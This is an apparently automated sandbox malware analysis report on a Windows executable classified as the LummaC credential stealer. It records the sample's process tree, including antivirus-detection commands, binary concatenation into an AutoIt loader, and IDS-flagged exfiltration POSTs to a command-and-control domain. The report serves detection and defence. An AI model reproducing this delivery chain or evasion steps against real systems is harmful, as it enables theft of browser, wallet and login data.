Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BagsThroat.exe

Overview

General Information

Sample name:BagsThroat.exe
Analysis ID:1581567
MD5:3b819d687b2bde89ade8eb1aeb4c6c5f
SHA1:e77057a1143c44eaf281e5f1a65ddc19c0a7cb98
SHA256:0158aa426fceb64ed638b0abddbb6e26dc0806938ad34246db7ff0088668a7ee
Tags:exelummastealeruser-zhuzhu0009
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • BagsThroat.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\BagsThroat.exe" MD5: 3B819D687B2BDE89ADE8EB1AEB4C6C5F)
    • cmd.exe (PID: 6048 cmdline: "C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6224 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1868 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1124 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2128 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4180 cmdline: cmd /c md 441412 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 3816 cmdline: extrac32 /Y /E Discovered MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7120 cmdline: findstr /V "Detailed" Eat MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5324 cmdline: cmd /c copy /b 441412\Noted.com + Button + Pledge + Ve + Michael + Barely + Managers + Boolean + Speeches + Heights + Tim 441412\Noted.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 6768 cmdline: cmd /c copy /b ..\Portrait + ..\Colored + ..\Classic + ..\Overseas + ..\Theaters + ..\Plays + ..\Continued S MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Noted.com (PID: 1276 cmdline: Noted.com S MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 4564 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6048, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2128, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T09:13:23.312130+010020283713Unknown Traffic192.168.2.549727104.21.80.1443TCP
      2024-12-28T09:13:25.381207+010020283713Unknown Traffic192.168.2.549733104.21.80.1443TCP
      2024-12-28T09:13:27.757910+010020283713Unknown Traffic192.168.2.549738104.21.80.1443TCP
      2024-12-28T09:13:29.923164+010020283713Unknown Traffic192.168.2.549744104.21.80.1443TCP
      2024-12-28T09:13:32.201365+010020283713Unknown Traffic192.168.2.549750104.21.80.1443TCP
      2024-12-28T09:13:34.733711+010020283713Unknown Traffic192.168.2.549756104.21.80.1443TCP
      2024-12-28T09:13:36.787090+010020283713Unknown Traffic192.168.2.549762104.21.80.1443TCP
      2024-12-28T09:13:39.138807+010020283713Unknown Traffic192.168.2.549768104.21.80.1443TCP
      2024-12-28T09:13:41.715508+010020283713Unknown Traffic192.168.2.549779104.21.80.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T09:13:24.069083+010020546531A Network Trojan was detected192.168.2.549727104.21.80.1443TCP
      2024-12-28T09:13:26.175399+010020546531A Network Trojan was detected192.168.2.549733104.21.80.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T09:13:24.069083+010020498361A Network Trojan was detected192.168.2.549727104.21.80.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T09:13:26.175399+010020498121A Network Trojan was detected192.168.2.549733104.21.80.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T09:13:37.598789+010020480941Malware Command and Control Activity Detected192.168.2.549762104.21.80.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-28T09:13:39.142379+010028438641A Network Trojan was detected192.168.2.549768104.21.80.1443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: BagsThroat.exeVirustotal: Detection: 23%Perma Link
      Source: BagsThroat.exeReversingLabs: Detection: 18%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.3% probability
      Source: BagsThroat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49768 version: TLS 1.2
      Source: BagsThroat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49727 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49727 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49762 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49768 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49733 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49733 -> 104.21.80.1:443
      Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49738 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49727 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49744 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49750 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49756 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49762 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49768 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49779 -> 104.21.80.1:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crackerdolk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 76Host: crackerdolk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VIIPI8FN01MEBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12802Host: crackerdolk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GK175PZ75M1UY3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15050Host: crackerdolk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WX4W87C9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20504Host: crackerdolk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WFZFUTULE9E3NLKXYAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5473Host: crackerdolk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A5ITWVH5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1201Host: crackerdolk.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OZ3O7DI1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 574908Host: crackerdolk.click
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: yHUkiJhYyguIo.yHUkiJhYyguIo
      Source: global trafficDNS traffic detected: DNS query: crackerdolk.click
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crackerdolk.click
      Source: BagsThroat.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: BagsThroat.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
      Source: BagsThroat.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: BagsThroat.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: BagsThroat.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: BagsThroat.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: BagsThroat.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: BagsThroat.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: BagsThroat.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: BagsThroat.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: BagsThroat.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: BagsThroat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: BagsThroat.exeString found in binary or memory: http://ocsp.digicert.com0
      Source: BagsThroat.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: BagsThroat.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: BagsThroat.exeString found in binary or memory: http://ocsp.digicert.com0I
      Source: BagsThroat.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Noted.com, 0000000D.00000000.2054497861.0000000000985000.00000002.00000001.01000000.00000007.sdmp, Noted.com.2.dr, Heights.9.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: BagsThroat.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: BagsThroat.exeString found in binary or memory: http://www.teamviewer.com
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Tim.9.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49768 version: TLS 1.2
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\PaxilMsJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\EstimatesYuJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\SubcommitteeDiffJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\EmailJdJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\CityCauseJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Windows\SustainablePurchasedJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: String function: 004062CF appears 57 times
      Source: BagsThroat.exeStatic PE information: invalid certificate
      Source: BagsThroat.exe, 00000000.00000002.2018080360.0000000000716000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs BagsThroat.exe
      Source: BagsThroat.exe, 00000000.00000003.2017080845.0000000000716000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs BagsThroat.exe
      Source: BagsThroat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/23@2/1
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\DiscoveredJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
      Source: C:\Users\user\Desktop\BagsThroat.exeFile created: C:\Users\user\AppData\Local\Temp\nsk371C.tmpJump to behavior
      Source: BagsThroat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\BagsThroat.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\BagsThroat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: BagsThroat.exeVirustotal: Detection: 23%
      Source: BagsThroat.exeReversingLabs: Detection: 18%
      Source: C:\Users\user\Desktop\BagsThroat.exeFile read: C:\Users\user\Desktop\BagsThroat.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\BagsThroat.exe "C:\Users\user\Desktop\BagsThroat.exe"
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 441412
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Discovered
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Detailed" Eat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 441412\Noted.com + Button + Pledge + Ve + Michael + Barely + Managers + Boolean + Speeches + Heights + Tim 441412\Noted.com
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Portrait + ..\Colored + ..\Classic + ..\Overseas + ..\Theaters + ..\Plays + ..\Continued S
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com Noted.com S
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\Desktop\BagsThroat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
